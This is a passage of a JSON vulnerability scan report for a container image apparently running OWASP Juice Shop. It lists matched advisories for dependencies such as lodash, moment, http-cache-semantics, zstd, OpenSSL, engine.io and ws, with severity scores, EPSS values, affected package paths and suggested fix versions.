4.17.20.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H","metrics":{"baseScore":7.4,"exploitabilityScore":2.3,"impactScore":5.2},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:M/Au:N/C:N/I:P/A:P","metrics":{"baseScore":5.8,"exploitabilityScore":8.6,"impactScore":5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2020-8203","epss":0.05213,"percentile":0.91408,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2020-8203","cwe":"CWE-770","source":"support@hackerone.com","type":"Secondary"},{"cve":"CVE-2020-8203","cwe":"CWE-1321","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"lodash.set","version":"4.3.2"}},"found":{"vulnerabilityID":"GHSA-p6mc-m468-83gw","versionConstraint":">=3.7.0,<=4.3.2 (semantic)"}}],"artifact":{"id":"pkg:npm/lodash.set@4.3.2?package-id=be8f210a7cd0fab3","name":"lodash.set","version":"4.3.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/lodash.set/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:lodash.set:lodash.set:4.3.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/lodash.set@4.3.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-446m-mv8f-q348","dataSource":"https://github.com/advisories/GHSA-446m-mv8f-q348","namespace":"github:language:javascript","severity":"High","urls":["https://nvd.nist.gov/vuln/detail/CVE-2017-18214","https://github.com/moment/moment/issues/4163","https://github.com/moment/moment/pull/4326","https://www.npmjs.com/advisories/532","https://www.tenable.com/security/tns-2019-02","https://github.com/moment/moment/commit/69ed9d44957fa6ab12b73d2ae29d286a857b80eb"],"description":"Regular Expression Denial of Service in moment","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2017-18214","epss":0.03673,"percentile":0.88199,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2017-18214","cwe":"CWE-400","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["2.19.3"],"state":"fixed","available":[{"version":"2.19.3","date":"2020-07-28","kind":"first-observed"}]},"advisories":[],"risk":2.75475},"relatedVulnerabilities":[{"id":"CVE-2017-18214","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2017-18214","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/moment/moment/issues/4163","https://nodesecurity.io/advisories/532","https://www.tenable.com/security/tns-2019-02"],"description":"The moment module before 2.19.3 for Node.js is prone to a regular expression denial of service via a crafted date string, a different vulnerability than CVE-2016-4055.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:N/C:N/I:N/A:P","metrics":{"baseScore":5,"exploitabilityScore":10,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2017-18214","epss":0.03673,"percentile":0.88199,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2017-18214","cwe":"CWE-400","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"moment","version":"2.0.0"}},"found":{"vulnerabilityID":"GHSA-446m-mv8f-q348","versionConstraint":"<2.19.3 (semantic)"},"fix":{"suggestedVersion":"2.19.3"}}],"artifact":{"id":"pkg:npm/moment@2.0.0?package-id=fb07dad56d7726f5","name":"moment","version":"2.0.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/express-jwt/node_modules/moment/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:momentjs:moment:2.0.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/moment@2.0.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-4xc9-xhrj-v574","dataSource":"https://github.com/advisories/GHSA-4xc9-xhrj-v574","namespace":"github:language:javascript","severity":"High","urls":["https://nvd.nist.gov/vuln/detail/CVE-2018-16487","https://hackerone.com/reports/380873","https://github.com/lodash/lodash/commit/90e6199a161b6445b01454517b40ef65ebecd2ad","https://security.netapp.com/advisory/ntap-20190919-0004","https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-16487.yml"],"description":"Prototype Pollution in lodash","cvss":[],"epss":[{"cve":"CVE-2018-16487","epss":0.01899,"percentile":0.76926,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2018-16487","cwe":"CWE-400","source":"support@hackerone.com","type":"Secondary"}],"fix":{"versions":["4.17.11"],"state":"fixed","available":[{"version":"4.17.11","date":"2020-07-28","kind":"first-observed"}]},"advisories":[],"risk":1.42425},"relatedVulnerabilities":[{"id":"CVE-2018-16487","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2018-16487","namespace":"nvd:cpe","severity":"Medium","urls":["https://hackerone.com/reports/380873","https://security.netapp.com/advisory/ntap-20190919-0004/"],"description":"A prototype pollution vulnerability was found in lodash <4.17.11 where the functions merge, mergeWith, and defaultsDeep can be tricked into adding or modifying properties of Object.prototype.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L","metrics":{"baseScore":5.6,"exploitabilityScore":2.3,"impactScore":3.4},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:M/Au:N/C:P/I:P/A:P","metrics":{"baseScore":6.8,"exploitabilityScore":8.6,"impactScore":6.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2018-16487","epss":0.01899,"percentile":0.76926,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2018-16487","cwe":"CWE-400","source":"support@hackerone.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"lodash","version":"2.4.2"}},"found":{"vulnerabilityID":"GHSA-4xc9-xhrj-v574","versionConstraint":"<4.17.11 (semantic)"},"fix":{"suggestedVersion":"4.17.11"}}],"artifact":{"id":"pkg:npm/lodash@2.4.2?package-id=dbbb92a4d9c4d340","name":"lodash","version":"2.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:lodash:lodash:2.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/lodash@2.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-fvqr-27wr-82fm","dataSource":"https://github.com/advisories/GHSA-fvqr-27wr-82fm","namespace":"github:language:javascript","severity":"Medium","urls":["https://nvd.nist.gov/vuln/detail/CVE-2018-3721","https://hackerone.com/reports/310443","https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a","https://security.netapp.com/advisory/ntap-20190919-0004","https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-3721.yml"],"description":"Prototype Pollution in lodash","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":6.5,"exploitabilityScore":2.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2018-3721","epss":0.02413,"percentile":0.81944,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2018-3721","cwe":"CWE-471","source":"support@hackerone.com","type":"Secondary"},{"cve":"CVE-2018-3721","cwe":"CWE-1321","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["4.17.5"],"state":"fixed","available":[{"version":"4.17.5","date":"2020-07-28","kind":"first-observed"}]},"advisories":[],"risk":1.3874749999999998},"relatedVulnerabilities":[{"id":"CVE-2018-3721","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2018-3721","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a","https://hackerone.com/reports/310443","https://security.netapp.com/advisory/ntap-20190919-0004/"],"description":"lodash node module before 4.17.5 suffers from a Modification of Assumed-Immutable Data (MAID) vulnerability via defaultsDeep, merge, and mergeWith functions, which allows a malicious user to modify the prototype of \"Object\" via __proto__, causing the addition or modification of an existing property that will exist on all objects.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","metrics":{"baseScore":6.5,"exploitabilityScore":2.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"nvd@nist.gov","type":"Primary","version":"2.0","vector":"AV:N/AC:L/Au:S/C:N/I:P/A:N","metrics":{"baseScore":4,"exploitabilityScore":8,"impactScore":2.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2018-3721","epss":0.02413,"percentile":0.81944,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2018-3721","cwe":"CWE-471","source":"support@hackerone.com","type":"Secondary"},{"cve":"CVE-2018-3721","cwe":"CWE-1321","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"lodash","version":"2.4.2"}},"found":{"vulnerabilityID":"GHSA-fvqr-27wr-82fm","versionConstraint":"<4.17.5 (semantic)"},"fix":{"suggestedVersion":"4.17.5"}}],"artifact":{"id":"pkg:npm/lodash@2.4.2?package-id=dbbb92a4d9c4d340","name":"lodash","version":"2.4.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:lodash:lodash:2.4.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/lodash@2.4.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-rc47-6667-2j5j","dataSource":"https://github.com/advisories/GHSA-rc47-6667-2j5j","namespace":"github:language:javascript","severity":"High","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-25881","https://github.com/kornelski/http-cache-semantics/blob/master/index.js%23L83","https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3253332","https://security.snyk.io/vuln/SNYK-JS-HTTPCACHESEMANTICS-3248783","https://github.com/kornelski/http-cache-semantics/commit/560b2d8ef452bbba20ffed69dc155d63ac757b74","https://security.netapp.com/advisory/ntap-20230622-0008"],"description":"http-cache-semantics vulnerable to Regular Expression Denial of Service","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-25881","epss":0.01613,"percentile":0.72776,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-25881","cwe":"CWE-1333","source":"report@snyk.io","type":"Secondary"},{"cve":"CVE-2022-25881","cwe":"CWE-1333","source":"nvd@nist.gov","type":"Primary"},{"cve":"CVE-2022-25881","cwe":"CWE-1333","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary"}],"fix":{"versions":["4.1.1"],"state":"fixed","available":[{"version":"4.1.1","date":"2023-02-03","kind":"first-observed"}]},"advisories":[],"risk":1.2097499999999999},"relatedVulnerabilities":[{"id":"CVE-2022-25881","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-25881","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/kornelski/http-cache-semantics/blob/master/index.js%23L83","https://security.netapp.com/advisory/ntap-20230622-0008/","https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-3253332","https://security.snyk.io/vuln/SNYK-JS-HTTPCACHESEMANTICS-3248783"],"description":"This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"report@snyk.io","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","metrics":{"baseScore":5.3,"exploitabilityScore":3.9,"impactScore":1.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-25881","epss":0.01613,"percentile":0.72776,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-25881","cwe":"CWE-1333","source":"report@snyk.io","type":"Secondary"},{"cve":"CVE-2022-25881","cwe":"CWE-1333","source":"nvd@nist.gov","type":"Primary"},{"cve":"CVE-2022-25881","cwe":"CWE-1333","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"http-cache-semantics","version":"3.8.1"}},"found":{"vulnerabilityID":"GHSA-rc47-6667-2j5j","versionConstraint":"<4.1.1 (semantic)"},"fix":{"suggestedVersion":"4.1.1"}}],"artifact":{"id":"pkg:npm/http-cache-semantics@3.8.1?package-id=bd9e0a0c5346494e","name":"http-cache-semantics","version":"3.8.1","type":"npm","locations":[{"path":"/juice-shop/node_modules/http-cache-semantics/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["BSD-2-Clause"],"cpes":["cpe:2.3:a:http-cache-semantics_project:http-cache-semantics:3.8.1:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/http-cache-semantics@3.8.1","upstreams":[]}},{"vulnerability":{"id":"CVE-2022-4899","dataSource":"https://security-tracker.debian.org/tracker/CVE-2022-4899","namespace":"debian:distro:debian:11","severity":"High","urls":[],"description":"A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-4899","epss":0.01588,"percentile":0.72395,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-4899","cwe":"CWE-400","source":"secalert@redhat.com","type":"Secondary"},{"cve":"CVE-2022-4899","cwe":"CWE-400","source":"nvd@nist.gov","type":"Secondary"},{"cve":"CVE-2022-4899","cwe":"CWE-400","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary"}],"fix":{"versions":[],"state":"wont-fix"},"advisories":[],"risk":1.1909999999999998},"relatedVulnerabilities":[{"id":"CVE-2022-4899","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-4899","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/facebook/zstd/issues/3200","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C63HAGVLQA6FJNDCHR7CNZZL6VSLILB2/","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JEHRBBYYTPA4DETOM5XAKGCP37NUTLOA/","https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QYLDK6ODVC4LJSDULLX6Q2YHTFOWABCN/","https://security.netapp.com/advisory/ntap-20230725-0005/"],"description":"A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-4899","epss":0.01588,"percentile":0.72395,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-4899","cwe":"CWE-400","source":"secalert@redhat.com","type":"Secondary"},{"cve":"CVE-2022-4899","cwe":"CWE-400","source":"nvd@nist.gov","type":"Secondary"},{"cve":"CVE-2022-4899","cwe":"CWE-400","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"Debian","version":""},"package":{"name":"libzstd","version":"1.5.7+dfsg-1"},"namespace":"debian:distro:debian:11"},"found":{"vulnerabilityID":"CVE-2022-4899","versionConstraint":"none (unknown)"}}],"artifact":{"id":"pkg:deb/debian/libzstd@1.5.7%2Bdfsg-1?distro=Debian&package-id=81799196ffdbbf0b","name":"libzstd","version":"1.5.7+dfsg-1","type":"deb","locations":[{"path":"/usr/lib/x86_64-linux-gnu/libzstd.so.1.5.7","layerID":"sha256:c0e409312adc366898967307565f692bb33d43a439d3de48e27d14b742389725","accessPath":""}],"language":"","licenses":[],"cpes":["cpe:2.3:a:libzstd:libzstd:1.5.7\\+dfsg-1:*:*:*:*:*:*:*"],"purl":"pkg:deb/Debian/libzstd@1.5.7%2Bdfsg-1?distro=Debian","upstreams":[]}},{"vulnerability":{"id":"CVE-2026-45447","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-45447","namespace":"debian:distro:debian:13","severity":"High","urls":[],"description":"Issue summary: A specially crafted PKCS#7 or S/MIME signed message could trigger a use-after-free during PKCS#7 signature verification. Impact summary: A use-after-free may result in process crashes, heap corruption, or potentially remote code execution. When processing a PKCS#7 or S/MIME signed message, if the SignedData digestAlgorithms field is present as an empty ASN.1 SET, OpenSSL may incorrectly free a caller-owned BIO during PKCS7_verify(). A subsequent use of the BIO by the calling application results in a use-after-free condition. In the common case this occurs when the application later calls BIO_free() on the BIO originally passed to PKCS7_verify(). Depending on allocator behavior and application-specific BIO usage patterns, this may result in a crash or other memory corruption. In some application contexts this may potentially be exploitable for remote code execution. Applications that process PKCS#7 or S/MIME signed messages using OpenSSL PKCS#7 APIs may be affected. Applications using the CMS APIs for this processing are not affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":8.8,"exploitabilityScore":2.9,"impactScore":5.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-45447","epss":0.01388,"percentile":0.6864,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-45447","cwe":"CWE-416","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-09","kind":"advisory"}]},"advisories":[{"id":"DSA-6335-1","link":"https://security-tracker.debian.org/tracker/DSA-6335-1"}],"risk":1.1312200000000001},"relatedVulnerabilities":[{"id":"CVE-2026-45447","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-45447","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/openssl/openssl/commit/3aad5eb7af4de4ee0633c30a8541a54d9bbde63c","https://github.com/openssl/openssl/commit/7d4a980c62258c5910cc883936e0c8dbab4d75a8","https://github.com/openssl/openssl/commit/9dfd688ad2290fc5075cacbc9bf0c9a93eefed54","https://github.com/openssl/openssl/commit/a541ae8bfe849a30cc885e8780715c0f488e496c","https://github.com/openssl/openssl/commit/c505d7559da5d5f9f2c3913c6883a5562ce7273e","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: A specially crafted PKCS#7 or S/MIME signed message could\ntrigger a use-after-free during PKCS#7 signature verification.\n\nImpact summary: A use-after-free may result in process crashes, heap\ncorruption, or potentially remote code execution.\n\nWhen processing a PKCS#7 or S/MIME signed message, if the SignedData\ndigestAlgorithms field is present as an empty ASN.1 SET, OpenSSL may\nincorrectly free a caller-owned BIO during PKCS7_verify(). A subsequent\nuse of the BIO by the calling application results in a use-after-free\ncondition.\n\nIn the common case this occurs when the application later calls\nBIO_free() on the BIO originally passed to PKCS7_verify(). Depending\non allocator behavior and application-specific BIO usage patterns, this\nmay result in a crash or other memory corruption. In some application\ncontexts this may potentially be exploitable for remote code execution.\n\nApplications that process PKCS#7 or S/MIME signed messages using OpenSSL\nPKCS#7 APIs may be affected. Applications using the CMS APIs for this\nprocessing are not affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","metrics":{"baseScore":8.8,"exploitabilityScore":2.9,"impactScore":5.9},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-45447","epss":0.01388,"percentile":0.6864,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-45447","cwe":"CWE-416","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-45447","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"GHSA-r7qp-cfhv-p84w","dataSource":"https://github.com/advisories/GHSA-r7qp-cfhv-p84w","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/socketio/engine.io/security/advisories/GHSA-r7qp-cfhv-p84w","https://nvd.nist.gov/vuln/detail/CVE-2022-41940","https://github.com/socketio/engine.io/commit/425e833ab13373edf1dd5a0706f07100db14e3c6","https://github.com/socketio/engine.io/commit/83c4071af871fc188298d7d591e95670bf9f9085"],"description":"Uncaught exception in engine.io","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":6.5,"exploitabilityScore":2.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-41940","epss":0.01939,"percentile":0.77435,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-41940","cwe":"CWE-248","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["6.2.1"],"state":"fixed","available":[{"version":"6.2.1","date":"2022-11-23","kind":"first-observed"}]},"advisories":[],"risk":1.114925},"relatedVulnerabilities":[{"id":"CVE-2022-41940","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-41940","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/socketio/engine.io/commit/425e833ab13373edf1dd5a0706f07100db14e3c6","https://github.com/socketio/engine.io/commit/83c4071af871fc188298d7d591e95670bf9f9085","https://github.com/socketio/engine.io/security/advisories/GHSA-r7qp-cfhv-p84w"],"description":"Engine.IO is the implementation of transport-based cross-browser/cross-device bi-directional communication layer for Socket.IO. A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process. This impacts all the users of the engine.io package, including those who uses depending packages like socket.io. There is no known workaround except upgrading to a safe version. There are patches for this issue released in versions 3.6.1 and 6.2.1.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":6.5,"exploitabilityScore":2.9,"impactScore":3.6},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H","metrics":{"baseScore":7.1,"exploitabilityScore":1.7,"impactScore":5.5},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-41940","epss":0.01939,"percentile":0.77435,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-41940","cwe":"CWE-248","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"engine.io","version":"4.1.2"}},"found":{"vulnerabilityID":"GHSA-r7qp-cfhv-p84w","versionConstraint":">=4.0.0,<6.2.1 (semantic)"},"fix":{"suggestedVersion":"6.2.1"}}],"artifact":{"id":"pkg:npm/engine.io@4.1.2?package-id=8c4af4f22e5de7e4","name":"engine.io","version":"4.1.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/engine.io/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:socket:engine.io:4.1.2:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/engine.io@4.1.2","upstreams":[]}},{"vulnerability":{"id":"GHSA-3h5v-q93c-6h6q","dataSource":"https://github.com/advisories/GHSA-3h5v-q93c-6h6q","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q","https://github.com/websockets/ws/issues/2230","https://github.com/websockets/ws/pull/2231","https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f","https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e","https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c","https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63"],"description":"ws affected by a DoS when handling a request with many HTTP headers","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}},{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2024-37890","epss":0.01346,"percentile":0.677,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2024-37890","cwe":"CWE-476","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["7.5.10"],"state":"fixed","available":[{"version":"7.5.10","date":"2024-06-18","kind":"first-observed"}]},"advisories":[],"risk":1.0498800000000001},"relatedVulnerabilities":[{"id":"CVE-2024-37890","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2024-37890","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f","https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef